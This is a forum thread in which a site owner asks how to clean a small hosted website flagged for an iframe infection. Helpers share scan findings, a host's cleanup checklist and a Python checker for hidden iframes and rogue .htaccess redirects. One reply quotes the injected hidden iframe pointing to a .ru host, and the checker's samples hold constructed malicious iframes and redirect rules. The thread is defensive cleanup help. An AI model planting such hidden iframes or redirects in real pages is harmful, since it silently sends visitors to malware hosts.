Hello All…
I created a small web site for a friend of mine who is an escort and put it up for her on a couple of the free hosting servers (Atspace.com and Izfree.com).
Recently, one of the hosted site links I created htXp://maygirl.atspace.com has been disabled by Google saying “This web site at maygirl.atspace.com has been reported as an attack site and has been blocked based on your security preferences” and the site no longer opens in Firefox browsers using the default security settings.
Then just the other day my friend started having people write to her reporting that her site on htXp://maygirl.izfree.com is now infected with the HTML:Iframe-inf virus/worm. It seems that Avast is the only virus software which can detect it, so I assume all the people who discovered the virus and wrote to her are running Avast.
I have done a lot of reading on this forum trying to figure out how to remove the virus from her site, and there are half a dozen posts on the subject, but to no avail. Most of what I have read on here seems to be geared towards advising people to avoid certain sites which contain the HTML:Iframe-inf virus/worm, but no advice on how to remove it from a site if your site is infected and you are the site administrator.
I have done a search within the code on all the HTML pages of the site for any scripts containing the word iframe, but I was not able to find anything locally on my computer within the site’s HTML files.
Any ideas on how to remove the script from the site would be much appreciated. I am wondering if it may have gotten in there in the first place from one of the banner ads she has on the site?
Cheers…
Hi colbybkk,
First a request to please break the links to the sites in question so they become unclickable by changing http into htXp and www into wXw…so the ignorant cannot get infected by clicking it here.
Definitely a hacked site: References to 1 suspicious domain found.
1 hidden external link found.
Google currently lists this page as suspicious*
Redirecting to: 3a.ru suspicious - displaying 1 of 1
Malicious software includes 3 scripting exploit(s) via
Thank you polonus. I have fixed the links in my first post above as you requested.
Thank you also for looking into the infection and verifying that one exists.
So what can I do to fix the site and remove the infection please?
Many thanks…
- This is commonly down to old content management software being vulnerable; see this example of a host's response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.
I suggest the following clean up procedure for both your accounts:
- Check all index pages for any signs of JavaScript injected into their coding. On Windows servers check any “default.aspx” or “default.cfm” pages as those are popular targets too.
- Remove any “rogue” files or PHP scripts uploaded by the hackers into your account. Such scripts allowed them to make account-wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.
- Check all .htaccess files, as hackers like to load redirects into them.
- Change all passwords for that end user account: the cp password, the ftp password, and any ftp sub accounts. Make sure to use a “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!
This, coupled with our server side changes, should prevent any resurfacing of the hackers' efforts. In some cases you may still have coding which allows for injection. All user input fields, hidden or not, should be hard coded, filtered, and sanitized before being handed off to PHP or a database, which will prevent coding characters from being submitted and run through your software.
Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
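As an added example (not code from this thread or from the quoted host), a small Python checker that applies the first and third steps above to files downloaded from the account: it flags iframes hidden by CSS, near-zero in size, or pointing at a host other than your own, and flags .htaccess rules that redirect to an absolute external URL. The sample page, the sample .htaccess and the malicious.example host are constructed for the example.

```python
import re

# Constructed sample index page: a normal ad iframe plus an injected hidden one,
# the same shape as the injection discussed in this thread (placeholder domain).
SAMPLE_INDEX = """<html><body>
<iframe src="/ads/banner.html" width=468 height=60></iframe>
<p>Welcome</p>
<iframe src="http://malicious.example:8080/index.php" width=171 height=186
 style="visibility: hidden"></iframe>
</body></html>"""

# Constructed sample .htaccess: one legitimate rule and one attacker redirect.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteRule ^old\.html$ /new.html [R=301,L]
RewriteCond %{HTTP_USER_AGENT} Googlebot
RewriteRule ^.*$ http://malicious.example/land.php [R,L]
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)')

def parse_attrs(raw):
    """Turn the inside of an <iframe ...> tag into a lowercase attribute dict."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(raw)}

def suspicious_iframes(html, own_hosts=()):
    """Return (src, reasons) for iframes that look injected: hidden via CSS,
    too small to be a real frame, or loading from a host that is not ours."""
    hits = []
    for raw in IFRAME_RE.findall(html):
        a = parse_attrs(raw)
        reasons = []
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by CSS")
        try:
            if int(a.get("width", 100)) < 5 or int(a.get("height", 100)) < 5:
                reasons.append("near-zero size")
        except ValueError:  # e.g. width="100%"; size check not applicable
            pass
        src = a.get("src", "")
        m = re.match(r"https?://([^/:]+)", src, re.IGNORECASE)
        if m and m.group(1).lower() not in own_hosts:
            reasons.append("external host " + m.group(1))
        if reasons:
            hits.append((src, reasons))
    return hits

def external_redirects(htaccess):
    """Lines in .htaccess that Redirect or RewriteRule to an absolute external URL."""
    return [ln for ln in htaccess.splitlines()
            if re.match(r"\s*(Redirect|RewriteRule)\b", ln, re.IGNORECASE)
            and re.search(r"https?://", ln, re.IGNORECASE)]
```

Run it over every downloaded index page and .htaccess; anything it flags should be compared against a known-good copy rather than just deleted blindly.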
Thank you. Can you please tell me how to identify any JavaScript injected into the index page coding?
As for any of the other rogue files or anything else, I don’t think I have anything like that in there.
There was one .htaccess file in the cgi-bin directory which I just simply deleted and the site still runs fine.
Attached is a screen shot of what is now on the web hosting server.
Can someone please test to see if the worm has now been removed since I deleted the .htaccess file?
Any other ideas on how to clean the site would be much appreciated.
Many thanks…
Hi colbybkk
This was the code in question of the hidden iframe that we cannot connect to any longer:
<body><iframe src="htxp://b3a.ru:8080/index.php" width=171 height=186 style="visibility: hidden"></iframe>
polonus
Cheers polonus.
Does that mean I have managed to get rid of the malicious/infected code already and the site is clean now?
Also, I assume you are referring to htXp://maygirl.izfree.com as the site in your last message? If so, that is great news.
I was wondering if you also might be able to tell me why htXp://maygirl.atspace.com is being reported to Google as an attack site and is actually being blocked at the moment?
htXp://maygirl.izfree.com is the infected site, but htXp://maygirl.atspace.com is being reported as an attack site. Seems the problems I am having with the two of them may be different even though the 2 are the same site simply running on different host servers.
Thanks again…
Getting rid of the offending iframe tags is a short term measure as if you don’t resolve the underlying reason your sites were hacked then it will happen again.
You need to speak to your host about how they/you can secure your site, as I would guess that there are probably other sites hosted by izfree.com and atspace.com with the same problem.
It doesn’t take long for Google to get to know about sites that have been hacked and are redirecting to malicious sites; it then adds that site to its blacklist. To get off it you would have to contact Google. But before doing that you would have to have got to the underlying vulnerability that was the cause of the site getting hacked.
Usually websites for services like those and other adult interests are targets for hackers. This is why I don’t suggest such business. The manager is going to have to at least check for updates daily in the software.